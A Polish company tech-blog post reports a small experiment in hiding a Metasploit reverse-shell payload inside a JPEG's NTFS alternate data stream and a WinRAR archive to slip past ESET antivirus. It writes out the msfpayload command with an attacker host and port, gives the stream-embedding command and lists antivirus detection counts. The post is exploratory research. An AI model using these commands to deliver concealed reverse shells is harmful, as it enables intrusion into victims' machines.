by Logo Technical Blog – Future Processing
05.08.2013
ADS – chowanie plików w archiwum_

Na ostatnim spotkaniu naszej grupy eksperckiej, nasz kolega Michał opowiadał o ciekawych rzeczach związanych z Social Engineeringiem. Wywiązała się też dyskusja na temat tego, czy w ADS moglibyśmy chować coś, co zostanie potem wysłane.

Poniżej mały reasearch na ten temat – próba ukrycia meterpretera wewnątrz obrazka. Research mały – tylko na przykładzie standardowanego Meterpretera, bez żadnych encoderów i tylko dla ESETa 32. Tak więc, zależnie od tego co potrzebujemy i chcemy zrobić, rezultaty mogą być różne.

Najpierw generujemy payload meterpretera:
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > 1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: {"LHOST"=>"172.16.104.130", "LPORT"=>"31337"}

Na próbę zrobienia czegokolwiek z tym plikiem ESET reaguje czerwoną gorączką – i bardzo słusznie.

jsowinski

Virus total: 34/46. Zaskakująco mało.

Teraz próba ukrycia pliku w ADSie. Wybieramy sobie obrazek (copyright Kona) i kopiujemy do niego nasz payload:

type 1.exe > cinder_kone2.jpeg

Taki plik ESET także wykrywa jako szkodliwy (jak widać skanuje ADSa):

jsowinski2

Teraz wracamy do problemu – czy da się ukryć ADS w archiwum. Po szybkim googlaniu okazuje się, że WinRAR obsługuje ADS w archiwach (ale tylko z nieszyfrowanych filesystemów) – trzeba zaznaczyć opcję „Save File Streams”:

jsowinski3

Taki RAR nie jest już wykrywany przez ESET-a jako zagrożenie. Czyżby PROFIT?

Nie do końca, bo przy rozpakowywaniu takigo archiwum ESET już reaguje, więc wiele nie zyskaliśmy 🙂

Co nam to daje – w praktyce pewnie niewiele (sporo ograniczeń: tylko WinRAR, brak możliwości rozpakowania na maszynie z antywirem) ale kiedyś może się przydać do przesłania pliku.

No i na koniec VirusTotal dla testowego pliku 16/46 – jak widać nie wszystkie antywirusy dały się oszukać:

jsowinski4

Comments

Cookies

This website stores cookies on your computer. These cookies are used to improve our website and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Cookies policy.